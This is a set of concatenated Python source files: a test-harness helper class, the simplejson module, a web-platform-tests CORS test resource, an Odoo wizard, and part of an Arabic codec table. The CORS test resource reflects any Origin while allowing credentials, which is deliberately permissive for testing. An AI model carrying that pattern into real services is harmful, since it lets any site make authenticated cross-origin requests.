If there is no specified run number, then returns the standard
output of the last run. If the run number is less than zero,
then returns the standard output from that many runs back from
the current run.
"""
if not run:
run = len(self._stdout)
elif run < 0:
run = len(self._stdout) + run
run = run - 1
return self._stdout[run]
def subdir(self, *subdirs):
"""Create new subdirectories under the temporary working
directory, one for each argument. An argument may be a list,
in which case the list elements are concatenated using the
os.path.join() method. Subdirectories multiple levels deep
must be created using a separate argument for each level:
test.subdir('sub', ['sub', 'dir'], ['sub', 'dir', 'ectory'])
Returns the number of subdirectories actually created.
"""
count = 0
for sub in subdirs:
if sub is None:
continue
if is_List(sub):
sub = apply(os.path.join, tuple(sub))
new = os.path.join(self.workdir, sub)
try:
os.mkdir(new)
except OSError:
pass
else:
count = count + 1
return count
def symlink(self, target, link):
"""Creates a symlink to the specified target.
The link name may be a list, in which case the elements are
concatenated with the os.path.join() method. The link is
assumed to be under the temporary working directory unless it
is an absolute path name. The target is *not* assumed to be
under the temporary working directory.
"""
link = self.canonicalize(link)
os.symlink(target, link)
def tempdir(self, path=None):
"""Creates a temporary directory.
A unique directory name is generated if no path name is specified.
The directory is created, and will be removed when the TestCmd
object is destroyed.
"""
if path is None:
try:
path = tempfile.mktemp(prefix=tempfile.template)
except TypeError:
path = tempfile.mktemp()
os.mkdir(path)
# Symlinks in the path will report things
# differently from os.getcwd(), so chdir there
# and back to fetch the canonical path.
cwd = os.getcwd()
try:
os.chdir(path)
path = os.getcwd()
finally:
os.chdir(cwd)
# Uppercase the drive letter since the case of drive
# letters is pretty much random on win32:
drive,rest = os.path.splitdrive(path)
if drive:
path = string.upper(drive) + rest
#
self._dirlist.append(path)
global _Cleanup
try:
_Cleanup.index(self)
except ValueError:
_Cleanup.append(self)
return path
def touch(self, path, mtime=None):
"""Updates the modification time on the specified file or
directory path name. The default is to update to the
current time if no explicit modification time is specified.
"""
path = self.canonicalize(path)
atime = os.path.getatime(path)
if mtime is None:
mtime = time.time()
os.utime(path, (atime, mtime))
def unlink(self, file):
"""Unlinks the specified file name.
The file name may be a list, in which case the elements are
concatenated with the os.path.join() method. The file is
assumed to be under the temporary working directory unless it
is an absolute path name.
"""
file = self.canonicalize(file)
os.unlink(file)
def verbose_set(self, verbose):
"""Set the verbose level.
"""
self.verbose = verbose
def where_is(self, file, path=None, pathext=None):
"""Find an executable file.
"""
if is_List(file):
file = apply(os.path.join, tuple(file))
if not os.path.isabs(file):
file = where_is(file, path, pathext)
return file
def workdir_set(self, path):
"""Creates a temporary working directory with the specified
path name. If the path is a null string (''), a unique
directory name is created.
"""
if (path != None):
if path == '':
path = None
path = self.tempdir(path)
self.workdir = path
def workpath(self, *args):
"""Returns the absolute path name to a subdirectory or file
within the current temporary working directory. Concatenates
the temporary working directory name with the specified
arguments using the os.path.join() method.
"""
return apply(os.path.join, (self.workdir,) + tuple(args))
def readable(self, top, read=1):
"""Make the specified directory tree readable (read == 1)
or not (read == None).
This method has no effect on Windows systems, which use a
completely different mechanism to control file readability.
"""
if sys.platform == 'win32':
return
if read:
def do_chmod(fname):
try: st = os.stat(fname)
except OSError: pass
else: os.chmod(fname, stat.S_IMODE(st[stat.ST_MODE]|stat.S_IREAD))
else:
def do_chmod(fname):
try: st = os.stat(fname)
except OSError: pass
else: os.chmod(fname, stat.S_IMODE(st[stat.ST_MODE]&~stat.S_IREAD))
if os.path.isfile(top):
# If it's a file, that's easy, just chmod it.
do_chmod(top)
elif read:
# It's a directory and we're trying to turn on read
# permission, so it's also pretty easy, just chmod the
# directory and then chmod every entry on our walk down the
# tree. Because os.path.walk() is top-down, we'll enable
# read permission on any directories that have it disabled
# before os.path.walk() tries to list their contents.
do_chmod(top)
def chmod_entries(arg, dirname, names, do_chmod=do_chmod):
for n in names:
do_chmod(os.path.join(dirname, n))
os.path.walk(top, chmod_entries, None)
else:
# It's a directory and we're trying to turn off read
# permission, which means we have to chmod the directoreis
# in the tree bottom-up, lest disabling read permission from
# the top down get in the way of being able to get at lower
# parts of the tree. But os.path.walk() visits things top
# down, so we just use an object to collect a list of all
# of the entries in the tree, reverse the list, and then
# chmod the reversed (bottom-up) list.
col = Collector(top)
os.path.walk(top, col, None)
col.entries.reverse()
for d in col.entries: do_chmod(d)
def writable(self, top, write=1):
"""Make the specified directory tree writable (write == 1)
or not (write == None).
"""
if sys.platform == 'win32':
if write:
def do_chmod(fname):
try: os.chmod(fname, stat.S_IWRITE)
except OSError: pass
else:
def do_chmod(fname):
try: os.chmod(fname, stat.S_IREAD)
except OSError: pass
else:
if write:
def do_chmod(fname):
try: st = os.stat(fname)
except OSError: pass
else: os.chmod(fname, stat.S_IMODE(st[stat.ST_MODE]|0200))
else:
def do_chmod(fname):
try: st = os.stat(fname)
except OSError: pass
else: os.chmod(fname, stat.S_IMODE(st[stat.ST_MODE]&~0200))
if os.path.isfile(top):
do_chmod(top)
else:
col = Collector(top)
os.path.walk(top, col, None)
for d in col.entries: do_chmod(d)
def executable(self, top, execute=1):
"""Make the specified directory tree executable (execute == 1)
or not (execute == None).
This method has no effect on Windows systems, which use a
completely different mechanism to control file executability.
"""
if sys.platform == 'win32':
return
if execute:
def do_chmod(fname):
try: st = os.stat(fname)
except OSError: pass
else: os.chmod(fname, stat.S_IMODE(st[stat.ST_MODE]|stat.S_IEXEC))
else:
def do_chmod(fname):
try: st = os.stat(fname)
except OSError: pass
else: os.chmod(fname, stat.S_IMODE(st[stat.ST_MODE]&~stat.S_IEXEC))
if os.path.isfile(top):
# If it's a file, that's easy, just chmod it.
do_chmod(top)
elif execute:
# It's a directory and we're trying to turn on execute
# permission, so it's also pretty easy, just chmod the
# directory and then chmod every entry on our walk down the
# tree. Because os.path.walk() is top-down, we'll enable
# execute permission on any directories that have it disabled
# before os.path.walk() tries to list their contents.
do_chmod(top)
def chmod_entries(arg, dirname, names, do_chmod=do_chmod):
for n in names:
do_chmod(os.path.join(dirname, n))
os.path.walk(top, chmod_entries, None)
else:
# It's a directory and we're trying to turn off execute
# permission, which means we have to chmod the directories
# in the tree bottom-up, lest disabling execute permission from
# the top down get in the way of being able to get at lower
# parts of the tree. But os.path.walk() visits things top
# down, so we just use an object to collect a list of all
# of the entries in the tree, reverse the list, and then
# chmod the reversed (bottom-up) list.
col = Collector(top)
os.path.walk(top, col, None)
col.entries.reverse()
for d in col.entries: do_chmod(d)
def write(self, file, content, mode = 'wb'):
"""Writes the specified content text (second argument) to the
specified file name (first argument). The file name may be
a list, in which case the elements are concatenated with the
os.path.join() method. The file is created under the temporary
working directory. Any subdirectories in the path must already
exist. The I/O mode for the file may be specified; it must
begin with a 'w'. The default is 'wb' (binary write).
"""
file = self.canonicalize(file)
if mode[0] != 'w':
raise ValueError, "mode must begin with 'w'"
with open(file, mode) as f:
f.write(content)
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
barbarubra/Don-t-know-What-i-m-doing. | refs/heads/master | python-build/python-libs/python-twitter/simplejson/__init__.py | 136 | r"""JSON (JavaScript Object Notation) <http://json.org> is a subset of
JavaScript syntax (ECMA-262 3rd edition) used as a lightweight data
interchange format.
:mod:`simplejson` exposes an API familiar to users of the standard library
:mod:`marshal` and :mod:`pickle` modules. It is the externally maintained
version of the :mod:`json` library contained in Python 2.6, but maintains
compatibility with Python 2.4 and Python 2.5 and (currently) has
significant performance advantages, even without using the optional C
extension for speedups.
Encoding basic Python object hierarchies::
>>> import simplejson as json
>>> json.dumps(['foo', {'bar': ('baz', None, 1.0, 2)}])
'["foo", {"bar": ["baz", null, 1.0, 2]}]'
>>> print json.dumps("\"foo\bar")
"\"foo\bar"
>>> print json.dumps(u'\u1234')
"\u1234"
>>> print json.dumps('\\')
"\\"
>>> print json.dumps({"c": 0, "b": 0, "a": 0}, sort_keys=True)
{"a": 0, "b": 0, "c": 0}
>>> from StringIO import StringIO
>>> io = StringIO()
>>> json.dump(['streaming API'], io)
>>> io.getvalue()
'["streaming API"]'
Compact encoding::
>>> import simplejson as json
>>> json.dumps([1,2,3,{'4': 5, '6': 7}], separators=(',',':'))
'[1,2,3,{"4":5,"6":7}]'
Pretty printing::
>>> import simplejson as json
>>> s = json.dumps({'4': 5, '6': 7}, sort_keys=True, indent=4)
>>> print '\n'.join([l.rstrip() for l in s.splitlines()])
{
"4": 5,
"6": 7
}
Decoding JSON::
>>> import simplejson as json
>>> obj = [u'foo', {u'bar': [u'baz', None, 1.0, 2]}]
>>> json.loads('["foo", {"bar":["baz", null, 1.0, 2]}]') == obj
True
>>> json.loads('"\\"foo\\bar"') == u'"foo\x08ar'
True
>>> from StringIO import StringIO
>>> io = StringIO('["streaming API"]')
>>> json.load(io)[0] == 'streaming API'
True
Specializing JSON object decoding::
>>> import simplejson as json
>>> def as_complex(dct):
... if '__complex__' in dct:
... return complex(dct['real'], dct['imag'])
... return dct
...
>>> json.loads('{"__complex__": true, "real": 1, "imag": 2}',
... object_hook=as_complex)
(1+2j)
>>> import decimal
>>> json.loads('1.1', parse_float=decimal.Decimal) == decimal.Decimal('1.1')
True
Specializing JSON object encoding::
>>> import simplejson as json
>>> def encode_complex(obj):
... if isinstance(obj, complex):
... return [obj.real, obj.imag]
... raise TypeError("%r is not JSON serializable" % (o,))
...
>>> json.dumps(2 + 1j, default=encode_complex)
'[2.0, 1.0]'
>>> json.JSONEncoder(default=encode_complex).encode(2 + 1j)
'[2.0, 1.0]'
>>> ''.join(json.JSONEncoder(default=encode_complex).iterencode(2 + 1j))
'[2.0, 1.0]'
Using simplejson.tool from the shell to validate and pretty-print::
$ echo '{"json":"obj"}' | python -msimplejson.tool
{
"json": "obj"
}
$ echo '{ 1.2:3.4}' | python -msimplejson.tool
Expecting property name: line 1 column 2 (char 2)
"""
__version__ = '2.0.7'
__all__ = [
'dump', 'dumps', 'load', 'loads',
'JSONDecoder', 'JSONEncoder',
]
from decoder import JSONDecoder
from encoder import JSONEncoder
_default_encoder = JSONEncoder(
skipkeys=False,
ensure_ascii=True,
check_circular=True,
allow_nan=True,
indent=None,
separators=None,
encoding='utf-8',
default=None,
)
def dump(obj, fp, skipkeys=False, ensure_ascii=True, check_circular=True,
allow_nan=True, cls=None, indent=None, separators=None,
encoding='utf-8', default=None, **kw):
"""Serialize ``obj`` as a JSON formatted stream to ``fp`` (a
``.write()``-supporting file-like object).
If ``skipkeys`` is ``True`` then ``dict`` keys that are not basic types
(``str``, ``unicode``, ``int``, ``long``, ``float``, ``bool``, ``None``)
will be skipped instead of raising a ``TypeError``.
If ``ensure_ascii`` is ``False``, then the some chunks written to ``fp``
may be ``unicode`` instances, subject to normal Python ``str`` to
``unicode`` coercion rules. Unless ``fp.write()`` explicitly
understands ``unicode`` (as in ``codecs.getwriter()``) this is likely
to cause an error.
If ``check_circular`` is ``False``, then the circular reference check
for container types will be skipped and a circular reference will
result in an ``OverflowError`` (or worse).
If ``allow_nan`` is ``False``, then it will be a ``ValueError`` to
serialize out of range ``float`` values (``nan``, ``inf``, ``-inf``)
in strict compliance of the JSON specification, instead of using the
JavaScript equivalents (``NaN``, ``Infinity``, ``-Infinity``).
If ``indent`` is a non-negative integer, then JSON array elements and object
members will be pretty-printed with that indent level. An indent level
of 0 will only insert newlines. ``None`` is the most compact representation.
If ``separators`` is an ``(item_separator, dict_separator)`` tuple
then it will be used instead of the default ``(', ', ': ')`` separators.
``(',', ':')`` is the most compact JSON representation.
``encoding`` is the character encoding for str instances, default is UTF-8.
``default(obj)`` is a function that should return a serializable version
of obj or raise TypeError. The default simply raises TypeError.
To use a custom ``JSONEncoder`` subclass (e.g. one that overrides the
``.default()`` method to serialize additional types), specify it with
the ``cls`` kwarg.
"""
# cached encoder
if (skipkeys is False and ensure_ascii is True and
check_circular is True and allow_nan is True and
cls is None and indent is None and separators is None and
encoding == 'utf-8' and default is None and not kw):
iterable = _default_encoder.iterencode(obj)
else:
if cls is None:
cls = JSONEncoder
iterable = cls(skipkeys=skipkeys, ensure_ascii=ensure_ascii,
check_circular=check_circular, allow_nan=allow_nan, indent=indent,
separators=separators, encoding=encoding,
default=default, **kw).iterencode(obj)
# could accelerate with writelines in some versions of Python, at
# a debuggability cost
for chunk in iterable:
fp.write(chunk)
def dumps(obj, skipkeys=False, ensure_ascii=True, check_circular=True,
allow_nan=True, cls=None, indent=None, separators=None,
encoding='utf-8', default=None, **kw):
"""Serialize ``obj`` to a JSON formatted ``str``.
If ``skipkeys`` is ``True`` then ``dict`` keys that are not basic types
(``str``, ``unicode``, ``int``, ``long``, ``float``, ``bool``, ``None``)
will be skipped instead of raising a ``TypeError``.
If ``ensure_ascii`` is ``False``, then the return value will be a
``unicode`` instance subject to normal Python ``str`` to ``unicode``
coercion rules instead of being escaped to an ASCII ``str``.
If ``check_circular`` is ``False``, then the circular reference check
for container types will be skipped and a circular reference will
result in an ``OverflowError`` (or worse).
If ``allow_nan`` is ``False``, then it will be a ``ValueError`` to
serialize out of range ``float`` values (``nan``, ``inf``, ``-inf``) in
strict compliance of the JSON specification, instead of using the
JavaScript equivalents (``NaN``, ``Infinity``, ``-Infinity``).
If ``indent`` is a non-negative integer, then JSON array elements and
object members will be pretty-printed with that indent level. An indent
level of 0 will only insert newlines. ``None`` is the most compact
representation.
If ``separators`` is an ``(item_separator, dict_separator)`` tuple
then it will be used instead of the default ``(', ', ': ')`` separators.
``(',', ':')`` is the most compact JSON representation.
``encoding`` is the character encoding for str instances, default is UTF-8.
``default(obj)`` is a function that should return a serializable version
of obj or raise TypeError. The default simply raises TypeError.
To use a custom ``JSONEncoder`` subclass (e.g. one that overrides the
``.default()`` method to serialize additional types), specify it with
the ``cls`` kwarg.
"""
# cached encoder
if (skipkeys is False and ensure_ascii is True and
check_circular is True and allow_nan is True and
cls is None and indent is None and separators is None and
encoding == 'utf-8' and default is None and not kw):
return _default_encoder.encode(obj)
if cls is None:
cls = JSONEncoder
return cls(
skipkeys=skipkeys, ensure_ascii=ensure_ascii,
check_circular=check_circular, allow_nan=allow_nan, indent=indent,
separators=separators, encoding=encoding, default=default,
**kw).encode(obj)
_default_decoder = JSONDecoder(encoding=None, object_hook=None)
def load(fp, encoding=None, cls=None, object_hook=None, parse_float=None,
parse_int=None, parse_constant=None, **kw):
"""Deserialize ``fp`` (a ``.read()``-supporting file-like object containing
a JSON document) to a Python object.
If the contents of ``fp`` is encoded with an ASCII based encoding other
than utf-8 (e.g. latin-1), then an appropriate ``encoding`` name must
be specified. Encodings that are not ASCII based (such as UCS-2) are
not allowed, and should be wrapped with
``codecs.getreader(fp)(encoding)``, or simply decoded to a ``unicode``
object and passed to ``loads()``
``object_hook`` is an optional function that will be called with the
result of any object literal decode (a ``dict``). The return value of
``object_hook`` will be used instead of the ``dict``. This feature
can be used to implement custom decoders (e.g. JSON-RPC class hinting).
To use a custom ``JSONDecoder`` subclass, specify it with the ``cls``
kwarg.
"""
return loads(fp.read(),
encoding=encoding, cls=cls, object_hook=object_hook,
parse_float=parse_float, parse_int=parse_int,
parse_constant=parse_constant, **kw)
def loads(s, encoding=None, cls=None, object_hook=None, parse_float=None,
parse_int=None, parse_constant=None, **kw):
"""Deserialize ``s`` (a ``str`` or ``unicode`` instance containing a JSON
document) to a Python object.
If ``s`` is a ``str`` instance and is encoded with an ASCII based encoding
other than utf-8 (e.g. latin-1) then an appropriate ``encoding`` name
must be specified. Encodings that are not ASCII based (such as UCS-2)
are not allowed and should be decoded to ``unicode`` first.
``object_hook`` is an optional function that will be called with the
result of any object literal decode (a ``dict``). The return value of
``object_hook`` will be used instead of the ``dict``. This feature
can be used to implement custom decoders (e.g. JSON-RPC class hinting).
``parse_float``, if specified, will be called with the string
of every JSON float to be decoded. By default this is equivalent to
float(num_str). This can be used to use another datatype or parser
for JSON floats (e.g. decimal.Decimal).
``parse_int``, if specified, will be called with the string
of every JSON int to be decoded. By default this is equivalent to
int(num_str). This can be used to use another datatype or parser
for JSON integers (e.g. float).
``parse_constant``, if specified, will be called with one of the
following strings: -Infinity, Infinity, NaN, null, true, false.
This can be used to raise an exception if invalid JSON numbers
are encountered.
To use a custom ``JSONDecoder`` subclass, specify it with the ``cls``
kwarg.
"""
if (cls is None and encoding is None and object_hook is None and
parse_int is None and parse_float is None and
parse_constant is None and not kw):
return _default_decoder.decode(s)
if cls is None:
cls = JSONDecoder
if object_hook is not None:
kw['object_hook'] = object_hook
if parse_float is not None:
kw['parse_float'] = parse_float
if parse_int is not None:
kw['parse_int'] = parse_int
if parse_constant is not None:
kw['parse_constant'] = parse_constant
return cls(encoding=encoding, **kw).decode(s)
|
mmatyas/servo | refs/heads/master | tests/wpt/web-platform-tests/XMLHttpRequest/resources/auth2/corsenabled.py | 367 | import imp
import os
def main(request, response):
response.headers.set('Access-Control-Allow-Origin', request.headers.get("origin"));
response.headers.set('Access-Control-Allow-Credentials', 'true');
response.headers.set('Access-Control-Allow-Methods', 'GET');
response.headers.set('Access-Control-Allow-Headers', 'authorization, x-user, x-pass');
response.headers.set('Access-Control-Expose-Headers', 'x-challenge, xhr-user, ses-user');
auth = imp.load_source("", os.path.join(os.path.abspath(os.curdir),
"XMLHttpRequest",
"resources",
"authentication.py"))
if request.method == "OPTIONS":
return ""
else:
return auth.main(request, response)
|
minhtuancn/odoo | refs/heads/8.0 | addons/account/wizard/account_state_open.py | 341 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import osv
from openerp.tools.translate import _
class account_state_open(osv.osv_memory):
_name = 'account.state.open'
_description = 'Account State Open'
def change_inv_state(self, cr, uid, ids, context=None):
proxy = self.pool.get('account.invoice')
if context is None:
context = {}
active_ids = context.get('active_ids')
if isinstance(active_ids, list):
invoice = proxy.browse(cr, uid, active_ids[0], context=context)
if invoice.reconciled:
raise osv.except_osv(_('Warning!'), _('Invoice is already reconciled.'))
invoice.signal_workflow('open_test')
return {'type': 'ir.actions.act_window_close'}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
olemis/brython | refs/heads/master | www/src/Lib/encodings/iso8859_6.py | 37 | """ Python Character Mapping Codec iso8859_6 generated from 'MAPPINGS/ISO8859/8859-6.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_table)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encoding_table)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='iso8859-6',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
### Decoding Table
decoding_table = (
'\x00' # 0x00 -> NULL
'\x01' # 0x01 -> START OF HEADING
'\x02' # 0x02 -> START OF TEXT
'\x03' # 0x03 -> END OF TEXT
'\x04' # 0x04 -> END OF TRANSMISSION
'\x05' # 0x05 -> ENQUIRY
'\x06' # 0x06 -> ACKNOWLEDGE
'\x07' # 0x07 -> BELL
'\x08' # 0x08 -> BACKSPACE
'\t' # 0x09 -> HORIZONTAL TABULATION
'\n' # 0x0A -> LINE FEED
'\x0b' # 0x0B -> VERTICAL TABULATION
'\x0c' # 0x0C -> FORM FEED
'\r' # 0x0D -> CARRIAGE RETURN
'\x0e' # 0x0E -> SHIFT OUT
'\x0f' # 0x0F -> SHIFT IN
'\x10' # 0x10 -> DATA LINK ESCAPE
'\x11' # 0x11 -> DEVICE CONTROL ONE
'\x12' # 0x12 -> DEVICE CONTROL TWO
'\x13' # 0x13 -> DEVICE CONTROL THREE
'\x14' # 0x14 -> DEVICE CONTROL FOUR
'\x15' # 0x15 -> NEGATIVE ACKNOWLEDGE
'\x16' # 0x16 -> SYNCHRONOUS IDLE
'\x17' # 0x17 -> END OF TRANSMISSION BLOCK
'\x18' # 0x18 -> CANCEL
'\x19' # 0x19 -> END OF MEDIUM
'\x1a' # 0x1A -> SUBSTITUTE
'\x1b' # 0x1B -> ESCAPE
'\x1c' # 0x1C -> FILE SEPARATOR
'\x1d' # 0x1D -> GROUP SEPARATOR
'\x1e' # 0x1E -> RECORD SEPARATOR
'\x1f' # 0x1F -> UNIT SEPARATOR
' ' # 0x20 -> SPACE
'!' # 0x21 -> EXCLAMATION MARK
'"' # 0x22 -> QUOTATION MARK
'#' # 0x23 -> NUMBER SIGN
'$' # 0x24 -> DOLLAR SIGN
'%' # 0x25 -> PERCENT SIGN
'&' # 0x26 -> AMPERSAND
"'" # 0x27 -> APOSTROPHE
'(' # 0x28 -> LEFT PARENTHESIS
')' # 0x29 -> RIGHT PARENTHESIS
'*' # 0x2A -> ASTERISK
'+' # 0x2B -> PLUS SIGN
',' # 0x2C -> COMMA
'-' # 0x2D -> HYPHEN-MINUS
'.' # 0x2E -> FULL STOP
'/' # 0x2F -> SOLIDUS
'0' # 0x30 -> DIGIT ZERO
'1' # 0x31 -> DIGIT ONE
'2' # 0x32 -> DIGIT TWO
'3' # 0x33 -> DIGIT THREE
'4' # 0x34 -> DIGIT FOUR
'5' # 0x35 -> DIGIT FIVE
'6' # 0x36 -> DIGIT SIX
'7' # 0x37 -> DIGIT SEVEN
'8' # 0x38 -> DIGIT EIGHT
'9' # 0x39 -> DIGIT NINE
':' # 0x3A -> COLON
';' # 0x3B -> SEMICOLON
'<' # 0x3C -> LESS-THAN SIGN
'=' # 0x3D -> EQUALS SIGN
'>' # 0x3E -> GREATER-THAN SIGN
'?' # 0x3F -> QUESTION MARK
'@' # 0x40 -> COMMERCIAL AT
'A' # 0x41 -> LATIN CAPITAL LETTER A
'B' # 0x42 -> LATIN CAPITAL LETTER B
'C' # 0x43 -> LATIN CAPITAL LETTER C
'D' # 0x44 -> LATIN CAPITAL LETTER D
'E' # 0x45 -> LATIN CAPITAL LETTER E
'F' # 0x46 -> LATIN CAPITAL LETTER F
'G' # 0x47 -> LATIN CAPITAL LETTER G
'H' # 0x48 -> LATIN CAPITAL LETTER H
'I' # 0x49 -> LATIN CAPITAL LETTER I
'J' # 0x4A -> LATIN CAPITAL LETTER J
'K' # 0x4B -> LATIN CAPITAL LETTER K
'L' # 0x4C -> LATIN CAPITAL LETTER L
'M' # 0x4D -> LATIN CAPITAL LETTER M
'N' # 0x4E -> LATIN CAPITAL LETTER N
'O' # 0x4F -> LATIN CAPITAL LETTER O
'P' # 0x50 -> LATIN CAPITAL LETTER P
'Q' # 0x51 -> LATIN CAPITAL LETTER Q
'R' # 0x52 -> LATIN CAPITAL LETTER R
'S' # 0x53 -> LATIN CAPITAL LETTER S
'T' # 0x54 -> LATIN CAPITAL LETTER T
'U' # 0x55 -> LATIN CAPITAL LETTER U
'V' # 0x56 -> LATIN CAPITAL LETTER V
'W' # 0x57 -> LATIN CAPITAL LETTER W
'X' # 0x58 -> LATIN CAPITAL LETTER X
'Y' # 0x59 -> LATIN CAPITAL LETTER Y
'Z' # 0x5A -> LATIN CAPITAL LETTER Z
'[' # 0x5B -> LEFT SQUARE BRACKET
'\\' # 0x5C -> REVERSE SOLIDUS
']' # 0x5D -> RIGHT SQUARE BRACKET
'^' # 0x5E -> CIRCUMFLEX ACCENT
'_' # 0x5F -> LOW LINE
'`' # 0x60 -> GRAVE ACCENT
'a' # 0x61 -> LATIN SMALL LETTER A
'b' # 0x62 -> LATIN SMALL LETTER B
'c' # 0x63 -> LATIN SMALL LETTER C
'd' # 0x64 -> LATIN SMALL LETTER D
'e' # 0x65 -> LATIN SMALL LETTER E
'f' # 0x66 -> LATIN SMALL LETTER F
'g' # 0x67 -> LATIN SMALL LETTER G
'h' # 0x68 -> LATIN SMALL LETTER H
'i' # 0x69 -> LATIN SMALL LETTER I
'j' # 0x6A -> LATIN SMALL LETTER J
'k' # 0x6B -> LATIN SMALL LETTER K
'l' # 0x6C -> LATIN SMALL LETTER L
'm' # 0x6D -> LATIN SMALL LETTER M
'n' # 0x6E -> LATIN SMALL LETTER N
'o' # 0x6F -> LATIN SMALL LETTER O
'p' # 0x70 -> LATIN SMALL LETTER P
'q' # 0x71 -> LATIN SMALL LETTER Q
'r' # 0x72 -> LATIN SMALL LETTER R
's' # 0x73 -> LATIN SMALL LETTER S
't' # 0x74 -> LATIN SMALL LETTER T
'u' # 0x75 -> LATIN SMALL LETTER U
'v' # 0x76 -> LATIN SMALL LETTER V
'w' # 0x77 -> LATIN SMALL LETTER W
'x' # 0x78 -> LATIN SMALL LETTER X
'y' # 0x79 -> LATIN SMALL LETTER Y
'z' # 0x7A -> LATIN SMALL LETTER Z
'{' # 0x7B -> LEFT CURLY BRACKET
'|' # 0x7C -> VERTICAL LINE
'}' # 0x7D -> RIGHT CURLY BRACKET
'~' # 0x7E -> TILDE
'\x7f' # 0x7F -> DELETE
'\x80' # 0x80 -> <control>
'\x81' # 0x81 -> <control>
'\x82' # 0x82 -> <control>
'\x83' # 0x83 -> <control>
'\x84' # 0x84 -> <control>
'\x85' # 0x85 -> <control>
'\x86' # 0x86 -> <control>
'\x87' # 0x87 -> <control>
'\x88' # 0x88 -> <control>
'\x89' # 0x89 -> <control>
'\x8a' # 0x8A -> <control>
'\x8b' # 0x8B -> <control>
'\x8c' # 0x8C -> <control>
'\x8d' # 0x8D -> <control>
'\x8e' # 0x8E -> <control>
'\x8f' # 0x8F -> <control>
'\x90' # 0x90 -> <control>
'\x91' # 0x91 -> <control>
'\x92' # 0x92 -> <control>
'\x93' # 0x93 -> <control>
'\x94' # 0x94 -> <control>
'\x95' # 0x95 -> <control>
'\x96' # 0x96 -> <control>
'\x97' # 0x97 -> <control>
'\x98' # 0x98 -> <control>
'\x99' # 0x99 -> <control>
'\x9a' # 0x9A -> <control>
'\x9b' # 0x9B -> <control>
'\x9c' # 0x9C -> <control>
'\x9d' # 0x9D -> <control>
'\x9e' # 0x9E -> <control>
'\x9f' # 0x9F -> <control>
'\xa0' # 0xA0 -> NO-BREAK SPACE
'\ufffe'
'\ufffe'
'\ufffe'
'\xa4' # 0xA4 -> CURRENCY SIGN
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\u060c' # 0xAC -> ARABIC COMMA
'\xad' # 0xAD -> SOFT HYPHEN
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\u061b' # 0xBB -> ARABIC SEMICOLON
'\ufffe'
'\ufffe'
'\ufffe'
'\u061f' # 0xBF -> ARABIC QUESTION MARK
'\ufffe'
'\u0621' # 0xC1 -> ARABIC LETTER HAMZA
'\u0622' # 0xC2 -> ARABIC LETTER ALEF WITH MADDA ABOVE
'\u0623' # 0xC3 -> ARABIC LETTER ALEF WITH HAMZA ABOVE
'\u0624' # 0xC4 -> ARABIC LETTER WAW WITH HAMZA ABOVE
'\u0625' # 0xC5 -> ARABIC LETTER ALEF WITH HAMZA BELOW
'\u0626' # 0xC6 -> ARABIC LETTER YEH WITH HAMZA ABOVE
'\u0627' # 0xC7 -> ARABIC LETTER ALEF
'\u0628' # 0xC8 -> ARABIC LETTER BEH
'\u0629' # 0xC9 -> ARABIC LETTER TEH MARBUTA
'\u062a' # 0xCA -> ARABIC LETTER TEH
'\u062b' # 0xCB -> ARABIC LETTER THEH
'\u062c' # 0xCC -> ARABIC LETTER JEEM
'\u062d' # 0xCD -> ARABIC LETTER HAH
'\u062e' # 0xCE -> ARABIC LETTER KHAH
'\u062f' # 0xCF -> ARABIC LETTER DAL
'\u0630' # 0xD0 -> ARABIC LETTER THAL
'\u0631' # 0xD1 -> ARABIC LETTER REH
'\u0632' # 0xD2 -> ARABIC LETTER ZAIN
'\u0633' # 0xD3 -> ARABIC LETTER SEEN
'\u0634' # 0xD4 -> ARABIC LETTER SHEEN
'\u0635' # 0xD5 -> ARABIC LETTER SAD
'\u0636' # 0xD6 -> ARABIC LETTER DAD
'\u0637' # 0xD7 -> ARABIC LETTER TAH
'\u0638' # 0xD8 -> ARABIC LETTER ZAH
'\u0639' # 0xD9 -> ARABIC LETTER AIN
'\u063a' # 0xDA -> ARABIC LETTER GHAIN
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\ufffe'
'\u0640' # 0xE0 -> ARABIC TATWEEL
'\u0641' # 0xE1 -> ARABIC LETTER FEH
'\u0642' # 0xE2 -> ARABIC LETTER QAF
'\u0643' # 0xE3 -> ARABIC LETTER KAF
'\u0644' # 0xE4 -> ARABIC LETTER LAM
'\u0645' # 0xE5 -> ARABIC LETTER MEEM
'\u0646' # 0xE6 -> ARABIC LETTER NOON
'\u0647' # 0xE7 -> ARABIC LETTER HEH
'\u0648' # 0xE8 -> ARABIC LETTER WAW
'\u0649' # 0xE9 -> ARABIC LETTER ALEF MAKSURA
'\u064a' # 0xEA -> ARABIC LETTER YEH
